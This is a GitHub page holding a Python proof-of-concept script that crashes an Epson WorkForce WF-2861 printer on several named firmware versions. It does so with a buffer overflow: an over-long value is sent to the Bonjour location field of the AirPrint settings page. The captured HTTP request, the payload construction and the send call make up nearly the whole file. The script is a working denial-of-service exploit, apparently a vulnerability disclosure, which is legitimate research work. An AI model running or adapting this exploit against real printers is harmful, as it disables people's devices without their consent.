Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
48 lines (40 sloc) 2.22 KB
#############################################################################
# Proof Of Concepts - Epson printer dos by bof in Air Print Setting' #
# email : epist.fortunatos@gmail.com #
# #
# tested specifications #
# firmware version : 10.48 LQ22I3(Recovery-mode), #
# 10.51.LQ20I6, #
# 10.52.LQ17IA(Latest) #
# printer model : WorkForce WF-2861 #
# effect : printer, scanner, web, touch-pannel, button #
#############################################################################
import sys
import requests
# http request in `Air Print Setting` - EPSON Printer web page
'''
GET /PRESENTATION/BONJOUR?INPUTT_BSNAME=aaaa&INPUTT_BLOCATION=aaaa&INPUTT_GEOLOCATION=0.000000%2C0.000000&SEL_PPROTOCOL=IPP&trigger=AirPrint_trg_confset HTTP/1.1
Host: 192.168.0.25
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.0.25/PRESENTATION/BONJOUR?INPUTT_BSNAME=aaaa&INPUTT_BLOCATION=aaaa&INPUTT_GEOLOCATION=0.000000%2C0.000000&SEL_PPROTOCOL=IPP&trigger=AirPrint_trg_set&tm=
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
'''
target_ip = sys.argv[1] # printer ip
payload_name = 'AAAA' # whatever
payload_note = 'A' * (256) # here (upper 251 byte will cause crash)
payload_location = '0,0' # whatever
payload_protocol = 'IPP' # whatever
# buffer overflow occur when setting up bonjour service
# buffer for service location is vulnerable
url = 'http://' + target_ip
url += '/PRESENTATION/BONJOUR?INPUTT_BSNAME=' + payload_name
url += '&INPUTT_BLOCATION=' + payload_note
url += '&INPUTT_GEOLOCATION=' + payload_location
url += '&SEL_PPROTOCOL=' + payload_protocol
url += '&trigger=AirPrint_trg_confset'
print '[*]payload : %s' % url
requests.get(url=url)